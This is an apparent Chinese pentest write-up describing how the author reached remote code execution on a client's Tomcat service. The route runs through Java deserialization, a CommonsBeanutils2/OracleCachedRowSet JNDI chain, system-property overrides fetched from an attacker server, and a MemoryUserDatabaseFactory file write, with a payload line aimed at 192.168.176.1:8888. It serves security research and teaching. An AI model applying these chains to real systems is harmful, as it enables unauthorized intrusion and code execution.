最近的一次渗透项目中,通过nmap扫到一个Jetty的服务。
用dirsearch扫到/metrics/
路径,但是再后面就扫不出来了。
从客户提供的Windows账号RDP登录上去,找到开启这个端口的服务,用Everything找到一个zip安装包,拖回来安装分析。
安装的时候注意到有一个设置代理的选项,将其设置为我的burp的地址,等待后续可能的惊喜发生。
安装完成之后,对其加入调试参数,然后把依赖jar包导入IDEA待调试。选择一些感兴趣的调试点开始调试。
最开始主要是希望找到/metrics/
后面到底有啥,于是随便GET、POST请求尝试一下。
请求响应完了之后并没有结束,看到burp里有这样一条记录。
通过http请求在网络中进行了序列化对象的传输。
于是我先是把POST的body直接设置为ysoserial/Urldns.jar(探测gadget)的payload,但是dnslog没有任何反应。我想如果反序列化成功的话,至少应该有一个探测Windows/Linux的记录吧。可见发送的探测payload没有被反序列化成功。
同时,注意到burp的响应中出现了貌似Exception的stackTrace的样子。
(不过截图放了一个命令行输错了的情况)
在客户端代码中通过设置合适的断点,找到发起HTTP请求的地方,复制,用Java代码构造请求。
由于当时我已经有客户端依赖的jar包,我就在IDEA里搜一下这个返回的响应类:ResponseMessage
。
发现客户端里有这个类。于是对响应的对象进行readObject还原,然后取出里面的Exception对象,打印stackTrace。
ResponseMessage responseMessage = readResponse(connection.getInputStream()); System.out.println(responseMessage); responseMessage.getException().printStackTrace();
通过分析异常栈知道,对于客户端请求的序列化数据,服务端并不是直接反序列化成对象,而是先读取了一个Integer类型,然后根据这个Integer数值,读取这样大小的后续字节,然后进行反序列化。
于是修改之后再发送。
最近正好在学习Jackson + Spring-aop的gadget,索性先用这个试试,还好这次终于成功走入了反序列化利用的流程。
虽然服务端没有spring-aop依赖。
这里没有使用Urldns.jar进行gadgets探测,由于拿到了客户端的依赖jar,可以先分析一下这里都有什么好东西,也许服务端跟这个差不多。
经过分析,得到这个结果:
注意到,根据客户端的推测,服务端用的是commons-beanutils2,
https://github.com/melloware/commons-beanutils2
奇怪之前没见过,github 0 star。不过大概看了一下,关键的gadget依然存在,只是改了一下包名。
修改包名,在本地测试,发现是能用的。
构造好payload发送给服务端,结果报了这个错:
java.lang.UnsupportedOperationException: When Java security is enabled, support for deserializing TemplatesImpl is disabled. This can be overridden by setting the jdk.xml.enableTemplatesImplDeserialization system property to true.
at java.xml/com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl.readObject(TemplatesImpl.java:270)
当时看到这里只是想怎么覆盖掉这个属性jdk.xml.enableTemplatesImplDeserialization
为true,后来才知道其实这里是因为开启了SecurityManager。参考这篇文章 尝试了各种绕过都失败了。它的策略比较严格。
分析一下不依赖Commons-Collections的CommonsBeanutils2这个gadget,
java.util.PriorityQueue#readObject ... java.util.Comparator#compare org.apache.commons.beanutils2.BeanComparator#compare org.apache.commons.beanutils2.PropertyUtils#getProperty ... Xxx#getYyy() (条件:Serializable、利用空参数的getter方法) com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl#getOutputProperties(现有的)
这里利用TemplatesImpl的getOutputProperties是用的最广的一个getter了,因为它存在于jdk中,而且能自定义任意类,可以进行各种扩展(内存马等),但是这条路目前被堵了。得换个别的getter。忘记在哪里看到的了,据说各种dataSource里很方便能getConnection()然后使用jdbc url。不过经过探测服务端没有postgresql、mysql、h2等数据库驱动,只有Oracle的。于是放弃了jdbc url这条路。
最后找到了oracle.jdbc.rowset.OracleCachedRowSet#getConnection
,这个方法可以通过getter方法将反序列化转到JNDI注入。
从前面的报错已经知道服务端使用了jdk高版本,所以得想如何绕过JNDI注入的限制。
绕过限制主要就是两方面:
不过反序列化就不考虑了,不然也不会转来JNDI注入。
ObjectFactory?看看目标环境有什么?首先想到的当然是用著名的Tomcat自带的依赖org.apache.naming.factory.BeanFactory
中的Reference的forceString
属性。只需要找一个接受单String类型的参数的方法完成RCE即可,对其方法名没有限制。@浅蓝师傅总结了很多(ELProcessor、Groovy等),很富裕不用担心没有。需要担心的是Tomcat版本是否在范围内。因为Tomcat7没有加入这个功能,而Tomcat高版本(9.0.63、8.5.79)移除了这个功能。
这里讨论了官方商量删除forceString
功能,
这里可以看到9.0.63确实移除了forceString这个功能。
不死心?本地试试就知道了。
那服务端版本是多少?
随便发一个包让服务端报错即可:
9.0.64,是修复的版本了。
所以,好走的forceString这条路已经不通了。
可用的选择:
通过学习《探索JNDI攻击》 from @浅蓝 on 2022北京网络安全大会,知道虽然不能通过forceString来RCE,但是依然存在其他的方法可以进行敏感的操作。
在他的ppt里介绍了使用commons-configuration(2)/groovy + tomcat-jdbc.jar实现System.setProperty()
的效果。
我理解一下,这里的原理是,首先找到一个特殊的ObjectFactory:org.apache.tomcat.jdbc.naming.GenericNamingResourcesFactory
(tomcat-jdbc.jar)。与org.apache.naming.factory.BeanFactory
(catalina.jar)相比,它支持调用某个类中的所有的方法,包括static的方法,只要以set开头。而org.apache.naming.factory.BeanFactory
是根据属性去找对应的setter方法(有abc这个属性,才会去调用setAbc(String value)这个方法)。理解如有错误还请指正。
附org.apache.naming.factory.BeanFactory
:
org.apache.tomcat.jdbc.naming.GenericNamingResourcesFactory
:
而另外一个特殊的类是org.apache.commons.configuration2.SystemConfiguration
(commons-configuration2-*.jar)或者org.apache.commons.configuration.SystemConfiguration
(commons-configuration-*.jar)。
它的setSystemProperties方法可以设置系统属性,也就是
setSystemProperties方法接收一个String类型的参数,叫做fileName
,但是实际上最后它会被构造成一个URL对象,所以可以传入的不仅是一个本地文件,也可以是一个网络请求,
所以我们可以在自己控制的web服务器上放一个文件,里面的内容是每行一个
key=value
想到之前失败的TemplatesImpl,不是因为jdk.xml.enableTemplatesImplDeserialization
系统属性的问题吗?这里找到机会了,先把这个属性给改了。
满怀欣喜的再发送payload,结果又报了这个错:
Well, not so bad. 至少说明设置系统属性的gadget生效了。
这个系统属性改了,依然无法利用成功。有没有别的系统属性值得改的呢?
又想到浅蓝师傅在ppt里提到的,可以试试修改这两个作为JNDI注入缓解措施的系统属性:
com.sun.jndi.ldap.object.trustURLCodebase=true
com.sun.jndi.rmi.object.trustURLCodebase=true
继续测试。
修改完之后,发现使用JNDIExploit的/Basic/Command/
依然不成功。于是尝试本地搭建环境试试是否真的能成功。
我先用Spring环境(其实就是java-sec-code)试试:
关键的点就在这个类:com.sun.naming.internal.VersionHelper
在loadClass的时候,会判断其private static final的属性TRUST_URL_CODE_BASE
值,只有为true的时候,才能从远程URL拉取class。而这个值在这个类第一次被加载的时候,就会根据当时的系统属性com.sun.jndi.ldap.object.trustURLCodebase
而赋值。所以即便后续我们在代码里将系统属性设置为true了,TRUST_URL_CODE_BASE
也不会再从系统属性中取值了。所以我们的利用不赶趟儿了。
下图可以看出,spring-boot启动的时候就会加载这个类:
开始我以为只是spring-boot会这样,我们的目标环境是tomcat可能不是这样。之后我又在tomcat的环境下测试了一遍。
发现使用不进行绕过的JNDI注入利用/Basic/Command/
依然失败。还是倒在了这个TRUST_URL_CODE_BASE
上。
为了让我们观察到这个属性被赋值的时刻,同样是设置了调试参数为server=y,suspend=y
。
调用栈为:
<clinit>:67, VersionHelper (com.sun.naming.internal)
<clinit>:87, ResourceManager (com.sun.naming.internal)
init:232, InitialContext (javax.naming)
<init>:184, InitialContext (javax.naming)
createMBeans:99, GlobalResourcesLifecycleListener (org.apache.catalina.mbeans)
lifecycleEvent:82, GlobalResourcesLifecycleListener (org.apache.catalina.mbeans)
fireLifecycleEvent:123, LifecycleBase (org.apache.catalina.util)
setStateInternal:423, LifecycleBase (org.apache.catalina.util)
setState:366, LifecycleBase (org.apache.catalina.util)
startInternal:923, StandardServer (org.apache.catalina.core)
start:183, LifecycleBase (org.apache.catalina.util)
start:772, Catalina (org.apache.catalina.startup)
invoke0:-1, NativeMethodAccessorImpl (jdk.internal.reflect)
invoke:62, NativeMethodAccessorImpl (jdk.internal.reflect)
invoke:43, DelegatingMethodAccessorImpl (jdk.internal.reflect)
invoke:566, Method (java.lang.reflect)
start:345, Bootstrap (org.apache.catalina.startup)
main:476, Bootstrap (org.apache.catalina.startup)
这时候实在没什么思路了,去知识星球里问问大佬们。
星主挺热心的,这里表示感谢。遗憾的是,根据星主提示的org.apache.batik.swing.JSVGCanvas#setURI
这个gadget测试发现目标并没有这个依赖。
还是回来继续看@浅蓝的文章。XXE/Tomcat文件写入RCE?(org.apache.catalina.users.MemoryUserDatabaseFactory)
先理解一下这个XXE的原理,它是后续RCE的前导。其原理是MemoryUserDatabaseFactory设置pathname,后续会转换成URL,然后进行database#open()的时候,从pathname指定的URL中取得xml内容进行解析。可以说是blind SSRF=> blind XXE。
这个factory利用开始看那篇文章的时候扫到过,但是想到目标是Linux,据说还得自己找创建目录的方法先略过了。这下实在没招,再硬着头皮看看这个有没有戏吧。
由于RCE需要创建目录,先看看XXE吧,虽然是个blind XXE。兴许能读到一些敏感的文件,帮忙后续的利用?
结果,由于blind XXE的局限性,只能读取到/etc/hostname。
再看看RCE的原理。看这张图:
注意到这里的database.save()。
就是tomcat会根据之前设置的pathname值在System.getProperty("catalina.base")
下创建pathname + ".new"这样的文件(不用担心,后续会重命名回来)。
看到这里,疑惑构造File的第二个参数能路径穿越吗?
在Windows上测试一下:
private static void test3() {
File file = new File(System.getProperty("java.io.tmpdir"), "lalala/../../../test_temp_cqq3.txt");
// File file = new File(System.getProperty("java.io.tmpdir"), "../../../test_temp_cqq2.txt");
// File file = new File(System.getProperty("java.io.tmpdir"),"test_temp_cqq.txt");
try {
FileWriter writer = new FileWriter(file);
writer.write("Hello, this is a test string.");
writer.close();
System.out.println("Successfully wrote to the file.");
} catch (IOException e) {
System.out.println("An error occurred.");
e.printStackTrace();
}
}
Windows下确实可以无视这里的lalala,直接跳目录。Linux下没有测试,应该是不能的。
从pathname这个名字,以及创建pathname + ".new"这样的文件,可以看出tomcat这里的用意也是期待传入的是一个相对路径的文件名。只不过这里由于URL比File更宽泛被abuse了。
需要担心的是,对于http://xxx/yyy
这样的文件名,如果中间路径比如http:
不存在,tomcat会自动帮你创建吗?tomcat并不会不帮你创建。你得自己想办法让System.getProperty("catalina.base")
路径下有这样一个目录,
Tomcat才会给你写入从pathname得到的文件内容。具体的代码在isWritable()方法中。
后续需要找到在System.getProperty("catalina.base")
目录下,创建任意目录,比如http:
的办法。
看到@浅蓝文章里说的他用的办法是org.h2.store.fs.FileUtils#createDirectory(String)
,需要配合forceString。但是现在已经不能用forceString了。还是得自己找。
先看看手里有什么可以用来创建目录的?
手里有
问了一下ChatGPT,创建目录的API至少有:
最开始还是希望从JDK里找到的,这样可以方便下次使用。尝试创建jdk的codeql数据库,但是碰到一堆问题,先不折腾了。直接grep然后手动确认吧。
先找到com.sun.org.apache.xalan.internal.xsltc.compiler.XSLTC,
看似有希望,但是它没有空参数的构造器,放弃。
又找到org.graalvm.compiler.debug.DiagnosticsOutputDirectory,但是它并不是Serializable。
算了吧,直接找项目中的代码吧,先能RCE了再说。
找到了两个,其中一个是通过getOutputStream来创建目录的,就用这个了。
构造序列化payload:
Serializable payload8 = XyzFileMkdir1.getObject("/opt/tomcat/aaa/bbb/http:/192.168.176.1:8888/whatever");
成功创建这样的目录:
然后实现文件写入:
至此,终于实现了RCE。